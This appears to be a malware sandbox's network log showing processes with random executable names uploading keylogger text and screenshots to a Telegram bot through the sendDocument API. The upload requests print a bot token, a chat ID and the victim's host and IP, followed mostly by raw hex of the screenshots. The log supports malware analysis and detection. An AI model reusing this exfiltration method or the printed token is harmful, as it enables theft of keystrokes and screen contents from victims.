2024-12-03 13:27:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:27:59 GMT Content-Type: application/json Content-Length: 547 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:27:59 UTC	547	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 34 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3884,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232479,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49774	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:27:59 UTC	556	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3571 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:27:59 UTC	3571	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 68 4f 4f 79 50 43 43 6c 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 32 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 32 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 32 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatahOOyPCCl.txt"Content-Type: application/octet-stream[08:27:21]<<Program Manager>>[08:27:21]<<Program Manager>>[08:27:21]<<Program Mana
2024-12-03 13:28:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:00 GMT Content-Type: application/json Content-Length: 547 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:00 UTC	547	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 34 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3885,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232480,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49802	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:11 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 55 54 4e 66 51 70 6d 49 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotUTNfQpmI.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:11 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:15 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49804	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:11 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 71 6e 42 59 49 77 4d 73 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotqnBYIwMs.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:11 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
